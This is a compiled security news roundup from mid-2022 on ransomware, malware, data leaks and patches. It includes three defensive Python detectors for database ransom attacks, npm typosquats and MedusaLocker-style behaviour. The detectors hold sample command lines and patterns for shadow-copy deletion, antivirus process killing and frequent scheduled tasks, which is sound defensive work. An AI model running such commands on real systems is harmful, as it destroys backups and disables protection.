The Russian Parliament voted this week on a law that will allow it to gather biometrics data from Russian banks into a central database named the Unified Biometric System (EBS). The law effectively allows the government to pilfer this data from banks without the express approval of Russian citizens, and government officials said this would allow the widespread deployment of biometric identification and authentication technologies to as many organizations as possible. Also helps with other “things” beyond paying for goods without payment cards, wink-wink.

Trickbot gang systematically attacks Ukraine

An IBM X-Force report published on Thursday claims that the operators of the Trickbot malware have been “systematically attacking Ukraine since the Russian invasion.” IBM notes that Trickbot has conducted at least six different malspam campaigns against Ukrainian users, something they have never done in the past. IBM notes that Trickbot is currently controlled by members of the old Conti ransomware gang, which got into a little bit of trouble earlier this year, having their hacking tools and internal chats leaked online after publicly expressing support for the Russian government.

Russian influence operations

A Recorded Future report published on Thursday has delved into Russia’s most recent influence operations, which according to the company, appear to be focused on creating a divide in Western countries around their efforts and support of Ukraine against Russia’s invasion.

These information operations almost certainly aim to undermine and divide the Western coalition on Ukraine both directly, by creating or exacerbating divisions between Western coalition countries, and indirectly, by influencing European populations to oppose their governments’ support of Ukraine and negative policies toward Russia.

Google Cloud Threat Horizons Report #3

In the third edition of its threat and trends report, the Google Cloud security team said that its cloud service continues to see a large number of attacks, with the majority aiming to deploy cryptomining payloads. The most common points of entry for these attacks continue to be brute-force attacks and unpatched software vulnerabilities.

In addition, Google also noted that, in recent months, they’ve seen a rise in ransomware-like attacks against some of their SQL database infrastructure.

The most common technique observed was where attackers were seen brute forcing SQL databases, cloning a database table into a new table, encrypting the data, and proceeding to drop the original table. Attackers have been observed leaving instructions in the new table that instruct the victim to transfer funds to a specified crypto wallet to recover their data. Similar tactics have been seen around cloud project takeover, with threats to delete data & resources. These attacks were most commonly observed in developer and proof of concept (POC) instances. In many instances, these were targeted due to fewer security controls being placed in non-production environments due to their perceived lower risk.

MySQL servers targeted with AsyncRAT

AhnLab researchers have published a report on a recent series of attacks against MySQL database servers that have been infected with the AsyncRAT remote access trojan. According to the research team, the attacks leverage brute-force attacks and dictionary attacks against the MySQL root admin account as the initial access vector.
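The clone-encrypt-drop pattern Google describes and the brute-force entry vector AhnLab reports both leave traces in database logs. The following script is an added example, not part of this roundup, Google’s report or AhnLab’s: it parses a constructed log written in a simplified MySQL general-log style (the line format, thread ids, hosts, table names and the failed-login threshold are all assumptions), counts failed logins per user and source, and flags any session that copies a table with CREATE TABLE ... AS SELECT and later drops the original, escalating the finding when the session’s source address was also the one brute-forcing.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed sample log (simplified MySQL general-log style, not real output):
# "<timestamp> <thread id> <Command> <argument>". Hosts and tables are made up.
SAMPLE_LOG = """\
2022-07-14T10:00:01Z 11 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:02Z 12 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:03Z 13 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:04Z 14 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:05Z 15 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:06Z 16 Connect  Access denied for user 'root'@'203.0.113.5' (using password: YES)
2022-07-14T10:00:07Z 17 Connect  Access denied for user 'admin'@'198.51.100.7' (using password: YES)
2022-07-14T10:00:09Z 19 Connect  root@203.0.113.5 on shop using TCP/IP
2022-07-14T10:00:10Z 19 Query    CREATE TABLE customers_enc AS SELECT * FROM customers
2022-07-14T10:00:12Z 19 Query    DROP TABLE customers
2022-07-14T10:00:13Z 19 Query    INSERT INTO customers_enc (email) VALUES ('RECOVER YOUR DATA: pay <wallet placeholder>')
2022-07-14T10:05:00Z 20 Connect  app@10.0.0.8 on shop using TCP/IP
2022-07-14T10:05:01Z 20 Query    SELECT * FROM orders WHERE id = 5
2022-07-14T10:06:00Z 21 Connect  etl@10.0.0.9 on shop using TCP/IP
2022-07-14T10:06:01Z 21 Query    CREATE TABLE orders_backup AS SELECT * FROM orders
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']+)'@'(?P<host>[^']+)'")
CONNECT_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>\S+) on")
CLONE_RE = re.compile(r"^CREATE\s+TABLE\s+(?P<new>\S+)\s+AS\s+SELECT\b.*\bFROM\s+(?P<src>\S+)", re.I)
DROP_RE = re.compile(r"^DROP\s+TABLE\s+(?:IF\s+EXISTS\s+)?(?P<tbl>\S+)", re.I)


@dataclass
class Event:
    ts: str
    tid: int
    cmd: str
    arg: str


@dataclass
class Finding:
    kind: str
    host: str
    user: str
    detail: str


def parse_log(text):
    """Turn log lines into Event records; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(m["ts"], int(m["tid"]), m["cmd"], m["arg"].strip()))
    return events


def detect_bruteforce(events, threshold=5):
    """Count failed logins per (user, host); return the pairs at or above the threshold."""
    denied = Counter()
    for ev in events:
        m = DENIED_RE.search(ev.arg)
        if m:
            denied[(m["user"], m["host"])] += 1
    return {key: n for key, n in denied.items() if n >= threshold}


def detect_clone_and_drop(events):
    """Flag a session that clones table t into a new table and then drops t."""
    session = {}                 # thread id -> (user, host) of a successful connect
    cloned = defaultdict(dict)   # thread id -> {source table: cloned table}
    findings = []
    for ev in events:
        if ev.cmd == "Connect":
            m = CONNECT_RE.match(ev.arg)
            if m:
                session[ev.tid] = (m["user"], m["host"])
            continue
        if ev.cmd != "Query":
            continue
        m = CLONE_RE.match(ev.arg)
        if m:
            cloned[ev.tid][m["src"].strip("`;")] = m["new"].strip("`")
            continue
        m = DROP_RE.match(ev.arg)
        if m:
            tbl = m["tbl"].strip("`;")
            if tbl in cloned[ev.tid]:   # the dropped table was cloned earlier in this session
                user, host = session.get(ev.tid, ("?", "?"))
                findings.append(Finding("clone_then_drop", host, user,
                                        f"{tbl} copied to {cloned[ev.tid][tbl]} then dropped (thread {ev.tid})"))
    return findings


def analyze(text, threshold=5):
    """Combine both detectors; a clone-and-drop from a brute-forcing host is escalated."""
    events = parse_log(text)
    brute = detect_bruteforce(events, threshold)
    findings = [Finding("bruteforce", host, user, f"{n} failed logins")
                for (user, host), n in brute.items()]
    brute_hosts = {host for (_, host) in brute}
    for f in detect_clone_and_drop(events):
        if f.host in brute_hosts:
            f.kind = "clone_then_drop_after_bruteforce"
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.kind}] {f.user}@{f.host}: {f.detail}")
```

The benign ETL session in the sample (thread 21) also clones a table but never drops the source, so it is not reported; the point of tying the two detectors together is that a single CREATE TABLE ... AS SELECT is ordinary administration, while clone, drop and a preceding burst of failed root logins from the same address is the sequence the reports describe.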

Teng Snake

S2W Talon has published a report on Teng Snake, a suspected Chinese threat actor that has been engaging in hacking and data leaks.

Checkmate ransomware

Taiwanese NAS vendor QNAP published a security advisory on Thursday warning its users about a new ransomware strain named Checkmate that has been infecting some of its devices. QNAP said the Checkmate gang uses dictionary attacks against a device’s SMB service to break into accounts using weak passwords.

1.2k malicious npm packages

Security firm Checkmarx said it uncovered a cluster of more than 1,200 malicious npm packages that have been uploaded on the npm portal in a short period of time using an automated process by a threat actor the company calls CuteBoi. The company said almost all the packages contain malicious code that runs a coinminer inside apps where the packages are deployed. Checkmarx has set up a dedicated website to track and list recent npm packages linked to the CuteBoi cluster.

Maui ransomware

In a joint security advisory published on Wednesday by CISA, the FBI, and the US Treasury, the US government said that North Korean state-sponsored hackers had developed a ransomware strain named Maui. Officials said the Maui ransomware had been used in attacks dating as far back as May 2021, and many of its targets have been US healthcare organizations. Cybersecurity firm Stairwell has also published its own report on this new threat, noting some of the Maui ransomware’s advanced features.

ABCsoup

Zimperium has published a report on ABCsoup, a cybercrime operation that builds and distributes malicious browser extensions for Google Chrome, Opera, and Firefox. The extensions mimic the IDs of legitimate add-ons and are typically distributed as Windows executables to bypass security checks found in official extension stores.

YourCyanide

CloudSEK has published a report on YourCyanide, a rare ransomware strain that comes with a mail-based worm behavior, previously also covered by Trend Micro here.

Ekipa

The same CloudSEK team also published a report this week on Ekipa, a remote access trojan sold on underground cybercrime forums for $3,000. According to CloudSEK, the RAT comes with a builder and would operate as a Microsoft Word macro or Excel add-on.

OrBit

Intezer published a technical analysis of a new malware strain named OrBit. The malware targets Linux systems and, once deployed on a compromised host, it can provide threat actors with remote access capabilities over SSH, can harvest credentials, and logs TTY commands. At a technical level, the malware is also of note because once deployed, it infects all processes running on a Linux system, including new ones.

LockBit 3.0

We now have the first technical report on the new version of the LockBit ransomware, also known as LockBit 3.0. Just like Fabian Wosar of Emsisoft pointed out last week, Cluster25 researchers also point out several similarities in the LockBit 3.0 code to the now-defunct Darkside and BlackMatter ransomware strains.

HavanaCrypt

Trend Micro has published an analysis of the HavanaCrypt ransomware, which is currently being distributed hidden in files posing as a Google Chrome browser update.

TripleCross

A computer science student open-sourced last month a rootkit named TripleCross that abuses the eBPF network packet filtering technology in Linux systems, a technique that has become popular with malware authors in recent months.

PINKPANTHER

On the same note, a security researcher also open-sourced this week a Windows kernel exploit named PINKPANTHER that can run shellcode on all recent versions of Windows to replace a process’ access token with the SYSTEM token and elevate an attacker’s privileges on an infected machine.

Chinese APT targets Russia

SentinelOne has published a report on a recent series of spear-phishing operations that appeared to have been carried out by a Chinese threat group against Russian organizations, including some government targets.

YamaBot

Japan’s CERT team has published a technical analysis of YamaBot (also known as Kaos), a malware strain used by North Korean state-sponsored hackers on compromised Linux and Windows systems.

APT campaign uses recent NATO conference as lure

Lab52 has published a report on a suspected APT campaign that used the recently concluded NATO conference in Madrid, Spain, as a lure for its spear-phishing emails.

Apple bug bounty news

Besides announcing Lockdown Mode this week, Apple also said it would add this new mode to its official bug bounty program. The company plans to reward researchers who find Lockdown Mode bypasses, and some vulnerabilities could earn researchers up to $2 million, in what Apple described as “the highest maximum bounty payout in the industry.”

What now?: So… this happened this week.

CVE-2022-23744 Detail

Group-IB splits

Cybersecurity and threat intelligence firm Group-IB has split its Russian branch from its international operation. The company was originally founded in Russia and later moved its headquarters to Singapore. Ilya Sachkov, the company’s founder and CEO, was detained in Moscow in September 2021 on treason charges for allegedly sharing data of Russian hackers with international authorities.

Tool release

Security firm SpecterOps has open-sourced a new tool called Koh that can be used to capture Windows account authentication tokens for new logon sessions and reuse them in later attacks. A technical introduction to the tool is also available in a dedicated blog post.

ZuoRAT Malware Targets SOHO Routers

A remote access trojan (RAT) known as ZuoRAT has been detected attacking small office/home office (SOHO) routers. Black Lotus Labs has been tracking the campaign, which has been active since 2020. ZuoRAT gives the attacker complete control of compromised SOHO routers in North America and Europe.

Note

  • Usually as we talk about attacks against home routers and similar “IoT” devices, we talk about nuisance malware like Mirai. But among the background noise are some more sophisticated attacks using the same simple exploits to turn these devices into a powerful distributed attack platform. This has been done in the past with MikroTik routers and others as well.
  • This malware operates on the assumption that SOHO routers are not maintained or secured. Make sure that your routers are configured for automatic firmware updates, that remote management is either disabled or restricted to very specific authorized devices, and pay attention to any vendor-provided security posture check. Lastly, make sure the device is still supported and replace it if not. This RAT cannot survive reboots, so if you think you’re infected, reboot your router; then perform a factory reset to make sure only the settings you intend are in effect.
  • These routers are the first line of defense in “work from home” applications. Yet, as with many smart appliances (“things”), keeping them current is costly and rarely routine.

Read more in

Apple’s Lockdown Mode Will Protect Users from Mercenary Spyware

Apple has announced a new feature that will help protect users’ devices from spyware. Lockdown Mode will be introduced in iOS 16, iPadOS 16, and macOS Ventura, which are scheduled to be released later this year. Apple says, “Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats.” Users will be able to enable the feature in the Settings menu.

Note

  • Interesting move by Apple to give users the option to prioritize security over functionality. Also interesting as only a very small number of users will benefit from it. We will have to see how many attacks are actually disrupted by this setting. (I don’t doubt it will work, but the real question will be if the right target group will take advantage of it.)
  • I think we will be surprised how many CEOs might be willing to lockdown their phone this way. If your CEO wears an analog watch that does NOT show altitude, phases of the moon or beep on every Instagram post, configure an iPhone in this Lockdown Mode when it comes out and do a demo to CEOs and even the Board.
  • Something to consider for potential targets (VIPs?) working in risky areas. Read and test the impacts carefully and review them with your possible user to ensure they don’t wind up turning this off because they are not able to work. Impacts include blocking most attachment types other than images, disabling link previews, disabling JavaScript JIT compilation on untrusted websites, blocking MDM profile updates, and blocking inbound service requests such as calls or FaceTime from parties you haven’t connected with previously.
  • One should add international travelers to the list of those that may find this mode useful. (Everyone might want to turn it on in such hostile environments as Starbucks, airports, or Washington DC.)

Read more in

OpenSSL Patches Two Vulnerabilities

OpenSSL maintainers have released updates to address two vulnerabilities, including a high-severity memory corruption flaw that could be exploited to allow remote code execution. Users are urged to upgrade to OpenSSL 3.0.5.

Note

  • These are two interesting vulnerabilities and I think they may have gotten a bit lost during the short work week. CVE-2022-2274 could have huge impact, but luckily it only affects OpenSSL on specific CPUs, and more importantly, it was caught immediately after the bug was introduced so the footprint of installed vulnerable OpenSSL versions is negligible. The second issue is also CPU version dependent, but it affects a much larger range. It could potentially affect a lot of data that was encrypted and is now considered “safe” even though a very small part of the data has not been encrypted.
  • Good to see fast reaction by OpenSSL. That needs to become the norm for open source software, medical devices, etc.
  • The flaw was introduced in OpenSSL 3.0.4, so make sure that when you’re updating, particularly if you’re playing catch-up, you move to at least 3.0.5. While you’re waiting on vendor provided patches, it’d be a good time to take stock of the versions of OpenSSL you have installed to see what your risk levels are.

Read more in

FBI: Deepfakes and Stolen PII are Being Used to Apply for Jobs

The US FBI says it has received an increasing number of complaints about people applying for remote work employment using stolen personally identifiable information and deepfake video. The phony job applicants are seeking remote or work-from-home positions that would allow them to access “customer PII, financial data, corporate IT databases and/or proprietary information.” Some reports include the applicants submitting stolen PII for background checks.

Note

  • Economic conditions mean many HR organizations are dealing with layoffs/redundancy while also hiring in key areas – busy HR people often take shortcuts. As a minimum, use this item to touch base with HR and IT management to make sure hires in positions that will be given sensitive access get thorough reference and background checks.
  • Trust but verify. Part of the scheme is using doctored videos, but the audio doesn’t match the video exactly, particularly for coughs or sneezes. Use employment background screening processes to verify that the person is truly who they claim to be. The cost of an in-person meet and greet may offset the cost of damage from a fake hire.

Read more in

Cyberattack Against Geographic Solutions Affects Multiple States’ Unemployment Benefits

A cyberattack against an IT services provider has disrupted unemployment and work benefits for people in multiple US states. Geographic Solutions has not yet made a public statement, but it has notified state agencies affected by the incident.

Note

  • This is a good reminder that we need to look at the supply chain for all business services to an organization for its Business Continuity Planning. If you have not done so already, you should review what key functions your organization has outsourced to third parties and how you would continue to provide that service should that provider become a victim of a cyber-attack or other issue that results in them being offline.
  • Using companies like Geographic Solutions provides easy access to services you may not be able to otherwise deliver, and they are able to achieve economies of scale, which is a boon to your business. Make sure that you’re incorporating the risk of outsourced services being offline for the time needed to recover from a ransomware attack. Make sure that interdependencies are also understood, then develop your response plan.

Read more in

IconBurst NPM Supply Chain Attack

Researchers at ReversingLabs have detected a software supply chain attack involving maliciously-crafted NPM packages. The attack has been ongoing since at least December 2021. The attacks use typo-squatting to trick users into downloading the malicious packages.

Note

  • These typos which result in the incorrect package are incredibly easy to make, particularly with pressure to deliver rapidly. Make sure your build/integration process is validating that the packages intended are what is loaded. Name, version, checksum, and that you’re responding to exceptions.
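The check described in the note above, as an added example (not code from ReversingLabs or from npm): a lockfile audit a CI step could run before installing. It parses a package-lock.json (the lockfileVersion 2/3 “packages” map) and flags packages that are not on an allowlist, names within edit distance 2 of an allowed name (the typosquat case), entries with a missing or malformed integrity hash, and tarballs resolved from anywhere other than the public registry. The allowlist, the lockfile and the lookalike package name “ionicon” are constructed for the example, not taken from the IconBurst report.

```python
"""Added example: audit an npm lockfile for typosquats, missing integrity
hashes and untrusted sources. Sample data below is constructed."""
import json
import re

# Subresource-integrity style value npm records per package: algo-base64.
INTEGRITY_RE = re.compile(r"^sha(256|384|512)-[A-Za-z0-9+/]+={0,2}$")
TRUSTED_REGISTRY = "https://registry.npmjs.org/"

# Assumed allowlist: the packages this project intends to load.
ALLOWED = {"ionicons", "lodash", "react"}

# Constructed package-lock.json (lockfileVersion 3 layout), not a real project's.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"ionicons": "^6.0.0", "lodash": "^4.17.21"}},
        "node_modules/ionicons": {
            "version": "6.0.0",
            "resolved": "https://registry.npmjs.org/ionicons/-/ionicons-6.0.0.tgz",
            "integrity": "sha512-" + "A" * 86 + "==",
        },
        "node_modules/ionicon": {  # made-up lookalike of "ionicons"
            "version": "1.0.3",
            "resolved": "https://registry.npmjs.org/ionicon/-/ionicon-1.0.3.tgz",
            "integrity": "sha512-" + "B" * 86 + "==",
        },
        "node_modules/lodash": {  # no integrity field: tarball is unverified
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
        },
        "node_modules/react": {  # pulled from an internal mirror, not the registry
            "version": "18.2.0",
            "resolved": "http://mirror.example/react-18.2.0.tgz",
            "integrity": "sha512-" + "C" * 86 + "==",
        },
    },
})


def levenshtein(a, b):
    """Edit distance; cheap enough for the few hundred names in a lockfile."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def package_name(path):
    """'node_modules/@scope/x' -> '@scope/x'; nested paths keep the last package."""
    return path.split("node_modules/")[-1]


def audit_lockfile(lock_json, allowed):
    """Return (package, reason) findings; an empty list means the lockfile passed."""
    lock = json.loads(lock_json)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project entry, not a dependency
        name = package_name(path)
        if name not in allowed:
            near = sorted(a for a in allowed if 0 < levenshtein(name, a) <= 2)
            if near:
                findings.append((name, "possible typosquat of " + near[0]))
            else:
                findings.append((name, "not on allowlist"))
        if not INTEGRITY_RE.match(meta.get("integrity", "")):
            findings.append((name, "missing or malformed integrity hash"))
        resolved = meta.get("resolved", "")
        if not resolved.startswith(TRUSTED_REGISTRY):
            findings.append((name, "resolved from untrusted source: " + (resolved or "<none>")))
    return findings


if __name__ == "__main__":
    for pkg, reason in audit_lockfile(SAMPLE_LOCK, ALLOWED):
        print(pkg, "-", reason)
```

Fail the build on any finding rather than logging it; the note’s point is that the exception has to be acted on. The allowlist step is what catches a typosquat that was published with a perfectly valid integrity hash, which the hash check alone never will.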

Read more in

North Korean Hackers Targeting US Healthcare Sector

In a joint alert, the US Treasury Department, the FBI, and the Cybersecurity and Infrastructure Security Agency (CISA) warn that North Korean state-sponsored cyberthreat actors are targeting US healthcare sector organizations. The hackers have been using Maui ransomware since at least May 2021. “The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files.”

Note

  • No matter what sector you’re in, add the IOCs from the CISA bulletin to your SIEM. The attack vector is not yet known; mitigations include making sure you have MFA on your entry points, that only authorized systems and individuals can access sensitive data, and that sensitive data is encrypted at rest wherever possible.

Read more in

National Defense Authorization Act Cybersecurity-Related Amendments

US Representative Jim Langevin (D-Rhode Island) has introduced several cybersecurity-related provisions to the National Defense Authorization Act (NDAA). One of the amendments would create an Office of Cybersecurity Statistics within the Cybersecurity and Infrastructure Security Agency (CISA). Another amendment includes provisions suggested by the Cyberspace Solarium Commission to bolster cybersecurity for “systemically important critical infrastructure.”

Note

  • I don’t see any game changers, mostly a lot more data collection and reporting requirements – more pages of documents have never equated to reduction in risk. Game changers would be requiring DoD (and by extension those who sell to DoD) to upgrade IT operations to meet basic security hygiene requirements, vs. more documents on how to spackle security on top of badly developed and administered systems in data centers and in the cloud.
  • Key to the Office of Cybersecurity Statistics will be the capability to process, store and analyze data in an expeditious fashion; while an exciting capability, expeditious funding is critical. Expect this to change in committee. This also includes attempting to insulate CISA from political swings by limiting the term of the CISA director to five years, and a requirement for military leaders to report on acceleration of domestic production of rare-earth metals.

Read more in

Google Updates Chrome to Fix Actively Exploited Vulnerability

Google has updated the Chrome Stable Channel for Desktop to version 103.0.5060.114. The newest version of the browser addresses four security issues, including a high-severity flaw that is being actively exploited. This is the fourth zero-day flaw in Chrome that Google has patched this year.

Note

  • Chrome, like most other browsers, will update automatically as long as you close and reopen. Even so, this is a good reminder that client-side attacks should be part of the scope of work in red team and pen testing engagements.
  • Heap overflow, use-after-free and type confusion issues are addressed. Chrome updates continue to hone our ability to push out-of-band patches. Don’t forget to set a time limit on users relaunching browsers to load the updated version. Be sure to check, and update, Chromium-based browsers in your environment.

Read more in

NIST’s Quantum-Resistant Algorithms

The US National Institute of Standards and Technology (NIST) has identified four candidate quantum-resistant encryption algorithms. The four algorithms will be incorporated into NIST’s post-quantum encryption standard. The algorithms are CRYSTALS-Kyber, CRYSTALS-Dilithium, FALCON, and SPHINCS+.

Note

  • The quest for quantum-resistant algorithms started in 2016. CRYSTALS-Kyber is intended for general key-establishment, CRYSTALS-Dilithium for digital signatures, FALCON as a fallback for cases where the CRYSTALS-Dilithium signatures are too large, and SPHINCS+ is the slowest of the bunch, but is suggested as an alternative where you want to use alternate mathematical models. Don’t expect to find these in vendor products right away. Once they are available, you’re going to want to do regression testing to not only ensure that you’re functional, but also for other operational or performance impacts.
  • We have ample time to replace RSA. There will be no “Quantum Apocalypse.” However, it is important to keep in mind that attacks against modern cryptography are rarely against the algorithms but rather against implementations and applications. We still have a long way to go.

Read more in

New U.S. federal warning highlights MedusaLocker group targeting health care organizations

The FBI and U.S. Cybersecurity and Infrastructure Security Agency warned of an uptick in activity from the MedusaLocker ransomware group. The group, which has been around since 2019, gained notoriety during the COVID-19 pandemic for targeting health care organizations. According to the joint alert, the group operates on a ransomware-as-a-service model, judging by the way it splits payments. MedusaLocker recently switched to a new infiltration method, targeting vulnerable RDP configurations. Once inside, it can carry out a variety of actions, including killing popular anti-virus software processes, scheduling a task to run the ransomware every 15 minutes, and deleting local backups.
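The three post-intrusion behaviours the alert lists (AV process termination, a scheduled task firing every 15 minutes, local backup deletion) each have a noisy, easily spotted command-line footprint, and they are far more telling in combination than alone. The detection below is an added example written for this page, not from the CISA/FBI alert or any vendor; it runs three rules over process-creation events in a simplified key=value form that is constructed here (not real Sysmon or EDR output) and reports hosts where at least two distinct behaviours fired. The hostnames, paths and the security-product process list are assumptions.

```python
"""Added example: flag hosts showing the MedusaLocker-style behaviour chain
described in the alert. Event lines below are constructed, not real telemetry."""
import re
from collections import defaultdict

CMD_RE = re.compile(r'cmd="([^"]*)"')
HOST_RE = re.compile(r"\bhost=(\S+)")

# Assumed security-product process names to watch in taskkill commands
# (MsMpEng.exe is Microsoft Defender's engine); extend for your own stack.
AV_PROCESSES = {"msmpeng.exe", "mssense.exe"}

# Constructed process-creation events in a simplified key=value layout.
SAMPLE_EVENTS = [
    'host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\notepad.exe cmd="notepad.exe C:\\notes.txt"',
    'host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\vssadmin.exe cmd="vssadmin.exe delete shadows /all /quiet"',
    'host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\schtasks.exe cmd="schtasks /create /tn svhost /tr C:\\Users\\Public\\svhost.exe /sc minute /mo 15 /f"',
    'host=WS01 user=CORP\\jdoe image=C:\\Windows\\System32\\taskkill.exe cmd="taskkill /f /im MsMpEng.exe"',
    'host=WS02 user=CORP\\backup image=C:\\Windows\\System32\\schtasks.exe cmd="schtasks /create /tn nightly /tr C:\\backup\\run.bat /sc daily /st 02:00"',
]


def shadow_copy_deletion(cmd):
    """Backup destruction: vssadmin/wmic shadow copy removal or wbadmin catalog deletion."""
    c = cmd.lower()
    return bool(re.search(r"vssadmin(\.exe)?\s+delete\s+shadows", c)
                or re.search(r"wmic(\.exe)?\s+shadowcopy\s+delete", c)
                or re.search(r"wbadmin(\.exe)?\s+delete\s+catalog", c))


def frequent_scheduled_task(cmd, max_minutes=15):
    """A task created with a MINUTE schedule firing at least every max_minutes."""
    c = cmd.lower()
    if "schtasks" not in c or "/create" not in c or not re.search(r"/sc\s+minute", c):
        return False
    m = re.search(r"/mo\s+(\d+)", c)
    interval = int(m.group(1)) if m else 1  # schtasks defaults /mo to 1
    return interval <= max_minutes


def av_process_kill(cmd):
    """taskkill aimed at a known security-product process."""
    c = cmd.lower()
    if "taskkill" not in c:
        return False
    return any(re.search(r"/im\s+" + re.escape(p), c) for p in AV_PROCESSES)


RULES = {
    "shadow_copy_deletion": shadow_copy_deletion,
    "frequent_scheduled_task": frequent_scheduled_task,
    "av_process_kill": av_process_kill,
}


def run_rules(events):
    """Map host -> set of rule names that fired on any of its events."""
    hits = defaultdict(set)
    for line in events:
        host, cmd = HOST_RE.search(line), CMD_RE.search(line)
        if not host or not cmd:
            continue  # malformed line; a real pipeline would count these
        for name, rule in RULES.items():
            if rule(cmd.group(1)):
                hits[host.group(1)].add(name)
    return dict(hits)


def suspicious_hosts(events, min_rules=2):
    """Hosts with at least min_rules distinct behaviours. One vssadmin call can be
    legitimate admin work; the combination with AV kills rarely is."""
    return sorted(h for h, r in run_rules(events).items() if len(r) >= min_rules)


if __name__ == "__main__":
    for host, rules in run_rules(SAMPLE_EVENTS).items():
        print(host, sorted(rules))
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

Tune `min_rules` and the AV list to your environment; the daily task on WS02 is the kind of legitimate schedule the interval threshold is there to leave alone, and the per-host correlation window should be bounded in time (minutes, not days) when this runs against a live feed.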

Read more

Popular wireless data router vulnerable to code execution vulnerabilities

Cisco Talos recently discovered four vulnerabilities in the Robustel R1510 industrial cellular router. The R1510 is a portable router that shares 2G, 3G and 4G wireless internet access. It comes with several advanced software features for users like the ability to connect to a VPN, cloud data management and smart reboot. There are three command injection vulnerabilities that exist in this device, as well as a data removal vulnerability that could allow an attacker to arbitrarily remove files from the device. An attacker could trigger the command injection issues — CVE-2022-32585, CVE-2022-33312 – CVE-2022-33314 and CVE-2022-33325 – CVE-2022-33329 — by sending a specific series of requests to the targeted device. If successful, the attacker could gain the ability to execute remote code.

Read more

China faces its first truly mega-leak

When you have a population of more than 1.4 billion people, a data breach of epic proportions is just bound to happen at one point or another, and it’s more of a question of time. While something like this has happened in the United States on several occasions, the Chinese government is currently dealing with the first mega leak of its kind and, by far, the largest data breach in the country’s history.

While the leak occurred months before, the incident came to light over the weekend, after a threat actor named ChinaDan posted an ad on an underground cybercrime forum, claiming to have obtained the personal data of more than one billion Chinese nationals from a database server that was left exposed online by the Shanghai National Police (SHGA).


According to a sample released by the threat actor, the data contains details such as names, addresses, national ID numbers, mobile numbers, and police and medical records.

ChinaDan said they are currently looking for buyers for this gigantic data trove, with which they were willing to part ways for the tiny sum of $200,000 worth of Bitcoin.

While previous leaks sold for this price have often turned out to be scams or publicity stunts, reporters from the Wall Street Journal and CNN said they already confirmed the data’s authenticity with some of the victims who had information listed in ChinaDan’s samples.

And in the spirit of the old adage “don’t believe anything until Russia denies it” (read China here), it didn’t take long for an official confirmation of the leak’s authenticity to come through—as Chinese authorities began censoring talk of the leak on Chinese social media as soon as the news started gaining traction on Monday, the Financial Times reported.

But by this point, it may be too late for the Chinese government to curtail discussions on the incident, as several cyber-security firms and researchers have already confirmed that the leak is authentic and that it came from a government source.

The leak also comes at a sensitive time for Beijing, as the government has been churning out rules and legislation on data privacy and data security over the past two years. While the government may have targeted its sprawling and generally-unregulated tech sector, the incident may end up being a seminal moment for its public agencies as well, many of which have leaked similar information before, but on a smaller scale.

Such leaks have been happening in China’s corner of the internet for years but have been largely ignored by western security firms and security researchers, many of which have been focused on providing services for western countries and companies, and past China-related leaks have typically never been shared outside local underground hacking forums and got very small coverage in some rogue Chinese IT and security blogs, once in a while.

Marriott security breach

The Marriott hotel chain confirmed on Tuesday a security incident after hackers broke into the company’s IT network and stole 20GB of sensitive data, including some documents containing credit card information. DataBreaches.net—which first reported the incident and had been in contact with the hackers—said the threat actor had been trying to extort the hotel chain over the past few weeks, asking for a ransom demand to not disclose the security breach to the public.

Tutu hack

Hackers have leaked the data of millions of users of Tutu.ru, a Russian online portal that can be used to book airplane, train, and bus tickets for national and international travel. Data for tens of millions of users has been leaked, including details such as names, home addresses, phone numbers, emails, passport scans, and even some hashed passwords. Tutu confirmed the breach in a statement to Russian media.

The cyber-attack that wasn’t

A Palestinian group of hackers known as Sabareen and Iranian media ran pompous reports on Monday about a cyber-attack that crippled Tel Aviv’s metro system. The problem with the reports is that Tel Aviv doesn’t have a functional metro system, which is still under construction, so the hackers didn’t disrupt anything except some poor construction company’s homepage.

Another crypto-heist

DeFi service Crema Finance lost $8.78 million worth of cryptocurrency over the weekend after an attacker exploited a bug in the company’s platform.

Blockchain security firm OtterSec described the incident as yet another “flash loan” attack that have plagued DeFi platforms for the past two years.

In a series of tweets posted on Monday and Tuesday, Crema Finance said its investigation is going well, and they believe they already identified the threat actor’s trail, including their Discord account.

EU puts out new big tech rules

The EU passed on Tuesday the Digital Services Act and Digital Markets Act, two pieces of legislation meant to curtail big tech’s powers and give more power to end-users. The Digital Services Act is focused on user security, data privacy, and also takes great care to push companies to be more aggressive with content moderation, including cracking down on misinformation campaigns. The Digital Markets Act cracks down on walled gardens—forcing big tech to play nice with smaller companies, such as providing service interoperability.

Chrome zero-day

